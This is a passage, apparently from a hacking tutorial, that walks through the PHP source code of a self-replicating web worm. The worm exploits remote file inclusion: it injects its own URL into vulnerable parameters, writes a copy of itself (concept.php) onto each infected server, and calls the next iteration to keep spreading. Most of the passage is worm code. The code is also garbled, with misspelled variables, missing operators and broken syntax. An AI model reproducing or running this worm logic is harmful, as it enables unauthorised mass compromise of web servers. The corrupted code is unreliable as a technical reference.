| ||
The exploit($str) function takes one parameter: a string containing the URL of a page that might have a vulnerability of the PHP source code injection type.
The argument contains [ *STRING* ] as a value of a potentially vulnerable parameter.
In essence, attempting an infection is a matter of sending the http://sites/test.php?aaa=http://site2/concept.php?&bbb=ccc request instead of http://site1/test.php?aaa=[*STRING*]&bbb=ccc . Here, site1 is the URL of the site that the worm is trying to infect , and site2 is the address of the file currently executed.
So, the exploit() function could be as follows .
exploit($str) |
---|
function exploit($str) { global $_SERVER, $HTTP_SERVER_VARS; $th=$_SERVER ["SCRIPT_URI"]; if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"]; if(empty($th)) $th=getenv("SCRIPT_URI"); // Getting the URL of the site if(!preg_match("/domain\.com/", $str)) exit; $str=str_replace("[*STRING*]", "$th?", $str); $str.="&from=".$_SERVER["SCRIPT_URI"]; file($str); // Initialization is done } |
Here, it is assumed that when the script (the CONCEPT.PHP file) is requested without parameters, it returns some PHP code that will execute on the server.
http://site/concept.php |
---|
<? if(file_exists("concept.php")) exit; // To avoid infecting one server repeatedly $f=fopen("concept.php", "w"); $a="<? // The source code of exploit.php ?> "; fwrite($f, $a); $th=$_SERVER["SCRIPT_URI"]; if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"]; if(empty($th)) $th=getenv("SCRIPT_URI"); preg_match("/^(https?\:\/\/.*)\/(.*?)/", $th, $r); $a=$r[1]."/concept.php?expl=yes"; file($a); ?> |
It only remains to write code that will display the result.
concept.php |
---|
$tmpname="concept.php"; echo "<? "; $th2=$_SERVER["SCRIPT_FILENAME"]; if(empty($th2)) $th2=$HTTP_SERVER_VARS["SCRIPT_FILENAME"]; if(empty($th2)) $th2=getenv("SCRIPT_FIIENAME"); echo " if(file_exists(\"$tmpname\")) exit; $f=fopen(\"$tmpname\", \"w\"); $a=\"".str_replace("$","\$",addslashes (implode("", file($th2)))). "\"; fwrite($f, $a); $th=$_SERVER[\"SCRIPT_URI\"]; if(empty($th)) $th=$HTTP_SERVER_VARS[\"SCRIPT_URT\"]; if(empty($th)) $th=getenv(\"SCRIPT_URI\"); preg_match(\"/^(https?\:\/\/.*)\/?{.*?)/\", $th, $r); $a=$r[1].\"/$thisname?exp1=yes\"; file($a); ?> "; ?> |
When the http://site/concept.php?expl=yes request is sent, it closes the loop and reproduction starts from the beginning.
http://site/concept.php?expl=yes |
---|
if($_GET["doexpl"]=="yes" $HTTP_GET_VARS["doexpl"]=="yes") { global $c, $_GET, $HTTP_GET_VARS, $_SERVER, $HTTP_SERVER_VARS; initsettins(); searchandexpl(); // The next iteration $countthis=(int)($_GET["countthis"]$HTTP_GET_VARS["countthis"]); if($countthis==0) $countthis=$c; $countthis--; $th=$_SERVER["SCRIPT_URI"]; if(empty($th)) $th=$HTTP_SERVER_VARS["SCRIPT_URI"]; if((empty ($th)) $th=getenv("SCRIPT_URI"); if($countthis>=l) file("$th?doexpl=modeok&countthis=$countthis"); exit; } |
| ||